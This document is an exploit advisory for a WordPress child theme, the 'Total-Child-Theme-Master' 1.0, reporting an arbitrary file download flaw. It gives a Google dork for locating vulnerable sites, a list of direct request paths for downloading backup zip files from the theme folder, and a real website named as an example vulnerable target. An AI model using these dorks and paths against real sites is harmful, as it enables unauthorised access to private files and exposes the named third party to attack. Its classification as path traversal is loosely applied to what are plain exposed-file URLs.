WordPress Total-Child-Theme-Master theme version 1.0 suffers from an arbitrary file disclosure vulnerability.
bd7be3561f509a07fff0647a2b678b9b#################################################################################################
# Exploit Title : WordPress Total-Child-Theme-Master Themes 1.0 Arbitrary
File Download
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org ~
wpexplorer-themes.com/total/docs/child-theme/
# Software Download Link :
wpexplorer.s3.amazonaws.com/freebies/total-child-theme.zip
+ github.com/wpexplorer/total-child-theme
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/total-child-theme-master/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/themes/total-child-theme-master/.....
/wp-content/themes/total-child-theme-master/Final%20LP%20TEMP.zip
/wp-content/themes/total-child-theme-master/Human-services-templates.zip
/wp-content/themes/total-child-theme-master/aa-archive-final.zip
/wp-content/themes/total-child-theme-master/aa-backup-single.zip
/wp-content/themes/total-child-theme-master/aa-backup-taxonomy.zip
/wp-content/themes/total-child-theme-master/aaaaaaaaaaaaaaaaaa-blog.php.zip
/wp-content/themes/total-child-theme-master/aaaaaaalatestsb-lp.zip
/wp-content/themes/total-child-theme-master/aa%20final%20sidebar%20fix.zip
/wp-content/themes/total-child-theme-master/author-template.zip
#################################################################################################
# Example Vulnerable Site =>
[+]
mediware.com/wp-content/themes/total-child-theme-master/aa-backup-single.zip
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################